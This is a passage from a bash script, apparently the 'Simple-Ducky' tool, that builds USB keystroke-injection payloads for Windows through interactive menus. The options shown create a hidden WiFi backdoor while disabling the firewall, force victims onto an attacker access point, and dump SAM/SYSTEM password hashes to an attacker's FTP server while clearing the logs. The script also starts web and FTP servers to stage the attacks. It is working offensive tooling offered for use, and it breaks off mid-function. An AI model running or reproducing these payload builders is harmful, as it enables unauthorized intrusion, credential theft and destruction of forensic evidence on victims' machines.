| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Backdoor w/UAC (Win 8) | |
| ################################################################################# | |
| f_wifibackdoorWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall" | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen" | |
| echo "" | |
| echo "" | |
| echo -e "" | |
| read -p "What would you like the SSID to be? " attackerssid | |
| echo "" | |
| read -p "What would you like the AP's key to be? " attackerkey | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Backdoor w/o UAC (Win 8) | |
| ################################################################################# | |
| f_wifibackdoorWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload opens an Administrative cmd.exe session, then creates a wireless access point and disables the firewall" | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen" | |
| echo "" | |
| echo "" | |
| echo -e "" | |
| read -p "What would you like the SSID to be? " attackerssid | |
| echo "" | |
| read -p "What would you like the AP's key to be? " attackerkey | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard languagee\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/wifibackdoorWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Autoconnect w/UAC (Designed for the WiFi Pineapple | Win Vista/7) | |
| ################################################################################# | |
| f_wifiautoconnectVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh." | |
| echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple" | |
| echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Xcellerator" | |
| echo -e "" | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| echo | |
| clear | |
| cp /usr/share/simple-ducky/payloads/wifiautoconnectVIS7uac.conf /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Autoconnect w/o UAC (Designed for the WiFi Pineapple | Win Vista/7) | |
| ################################################################################# | |
| f_wifiautoconnectVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh." | |
| echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple" | |
| echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory" | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Xcellerator" | |
| echo -e "" | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| cp /usr/share/simple-ducky/payloads/wifiautoconnectVIS7nouac.conf /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Autoconnect w/UAC (Designed for the WiFi Pineapple | Win 8) | |
| ################################################################################# | |
| f_wifiautoconnectWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh." | |
| echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple" | |
| echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory" | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Xcellerator" | |
| echo "" | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| cp /usr/share/simple-ducky/payloads/wifiautoconnectWIN8uac.conf /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Autoconnect w/o UAC (Designed for the WiFi Pineapple | Win 8) | |
| ################################################################################# | |
| f_wifiautoconnectWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh." | |
| echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple" | |
| echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory" | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Xcellerator" | |
| echo "" | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| cp /usr/share/simple-ducky/payloads/wifiautoconnectWIN8nouac.conf /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Password Attacks | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # LM/NTLM Hash Dump From Live System w/UAC (Win Vista/7/Server 2008) | |
| ################################################################################# | |
| f_livehashVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there." | |
| echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs" | |
| echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip" | |
| echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference." | |
| echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7/Server 2008 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo ""echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip | |
| echo "" | |
| read -p "Please set a password to be for your encrypted zip files. " zippassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m" | |
| sleep 4 | |
| clear | |
| cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe | |
| clear | |
| service apache2 restart | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # LM/NTLM Hash Dump From Live System w/o UAC (Win Vista/7/Server 2008) | |
| ################################################################################# | |
| f_livehashVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there." | |
| echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs" | |
| echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip" | |
| echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference." | |
| echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7/Server 2008 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo ""echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip | |
| echo "" | |
| read -p "Please set a password to be for your encrypted zip files. " zippassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m" | |
| sleep 4 | |
| clear | |
| cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe | |
| clear | |
| service apache2 restart | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # LM/NTLM Hash Dump From Live System w/UAC (Windows 8) | |
| ################################################################################# | |
| f_livehashWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there." | |
| echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs" | |
| echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip" | |
| echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference." | |
| echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo ""echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip | |
| echo "" | |
| read -p "Please set a password to be for your encrypted zip files. " zippassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m" | |
| sleep 4 | |
| clear | |
| cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe | |
| clear | |
| service apache2 restart | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # LM/NTLM Hash Dump From Live System w/o UAC (Windows 8) | |
| ################################################################################# | |
| f_livehashWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there." | |
| echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs" | |
| echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip" | |
| echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference." | |
| echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m skysploit" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo ""echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip | |
| echo "" | |
| read -p "Please set a password to be for your encrypted zip files. " zippassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
